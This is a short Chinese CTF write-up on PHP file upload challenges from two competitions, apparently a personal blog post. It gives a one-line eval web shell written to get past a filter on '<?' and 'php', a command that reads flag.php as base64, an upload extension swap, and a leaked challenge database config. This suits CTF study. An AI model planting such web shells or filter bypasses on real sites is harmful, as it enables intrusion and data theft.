php文件上传

“百度杯”CTF比赛 2017 九月场-upload

题目描述

1
2

想怎么传就怎么传，就是这么任性。
tips:flag在flag.php中   

过滤了<? 和php
使用
<script language='PhP'>@eval($_POST['cmd']);</script>
读取flag即可，有时候system函数无回显可以加上base64
cmd=system("cat ../flag.php | base64");然后解码即可

第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload？

首先文件上传，抓包改后缀即可，然后发现没有flag!!!
但是读取config.php的时候

1
2
3
4
5
6
7
8
9
10
11
12

<?php
error_reporting(0);
session_start();
$servername = "localhost";
$username = "ctf";
$password = "ctfctfctf";
$database = "ctf";

// 创建连接
$conn = mysql_connect($servername,$username,$password) or die(" connect to mysql error");
mysql_select_db($database);
?>

然后通过蚁剑连接数据库，获得flag